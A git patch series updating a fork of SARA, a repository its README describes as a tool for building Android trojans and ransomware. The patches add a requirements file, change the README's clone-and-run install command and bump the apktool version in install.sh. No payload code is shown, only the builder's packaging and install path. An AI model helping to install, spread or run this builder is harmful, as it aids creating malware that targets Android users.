From 4e959b54d572d770b4547cad3370a19b008510a7 Mon Sep 17 00:00:00 2001 From: IHNGEYMING <164995233+IHNGEYMING@users.noreply.github.com> Date: Fri, 22 Nov 2024 09:02:49 +0700 Subject: [PATCH 1/4] Added requirements.txt --- requirements.txt | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 requirements.txt diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..c0db057 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,2 @@ +requests +Pillow From 97d172877db39309e23e89dd25b74b1491543fea Mon Sep 17 00:00:00 2001 From: IHNGEYMING <164995233+IHNGEYMING@users.noreply.github.com> Date: Fri, 22 Nov 2024 09:06:08 +0700 Subject: [PATCH 2/4] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 9352dab..00b087e 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,6 @@ +## What's New? +Added requirements.txt When Error Execute Command pip install -r requirements.txt ### About SARA is a simple tool to create Trojan or Ransomware for Android devices ### Disclaimer From 153ab4a03b53170991a2bc8df759545a4c7705fb Mon Sep 17 00:00:00 2001 From: IHNGEYMING <164995233+IHNGEYMING@users.noreply.github.com> Date: Mon, 25 Nov 2024 20:12:31 +0700 Subject: [PATCH 3/4] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 00b087e..20f2fb2 100644 --- a/README.md +++ b/README.md @@ -8,7 +8,7 @@ This tool is made for education purpose only, the author is not responsible for ### Installation * Kali Linux, Ubuntu, Debian, Termux (proot-distro: Ubuntu) ```bash -git clone https://github.com/termuxhackers-id/SARA && cd SARA && sudo bash install.sh && python3 sara.py +git clone https://github.com/IHNGEYMING/SARA && cd SARA && sudo bash install.sh && python3 sara.py ``` ### Demo * Generate Custom Trojan (metasploit) From 02f33863044306334f299d47c318dc234d34cf05 Mon Sep 17 00:00:00 2001 From: IHNGEYMING <164995233+IHNGEYMING@users.noreply.github.com> Date: Thu, 28 Nov 2024 08:07:05 +0700 Subject: [PATCH 4/4] Update install.sh --- install.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/install.sh b/install.sh index afa73d7..e825702 100644 --- a/install.sh +++ b/install.sh @@ -1,7 +1,7 @@ #!/usr/bin/bash sudo apt-get install aapt wget python3 python3-pip zipalign imagemagick openjdk-8-jdk -y wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool -wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.8.1.jar +wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.10.0.jar sudo mv apktool /usr/bin/apktool && sudo chmod +x /usr/bin/apktool -sudo mv apktool_2.8.1.jar /usr/bin/apktool.jar && sudo chmod +x /usr/bin/apktool.jar +sudo mv apktool_2.10.0.jar /usr/bin/apktool.jar && sudo chmod +x /usr/bin/apktool.jar pip install Pillow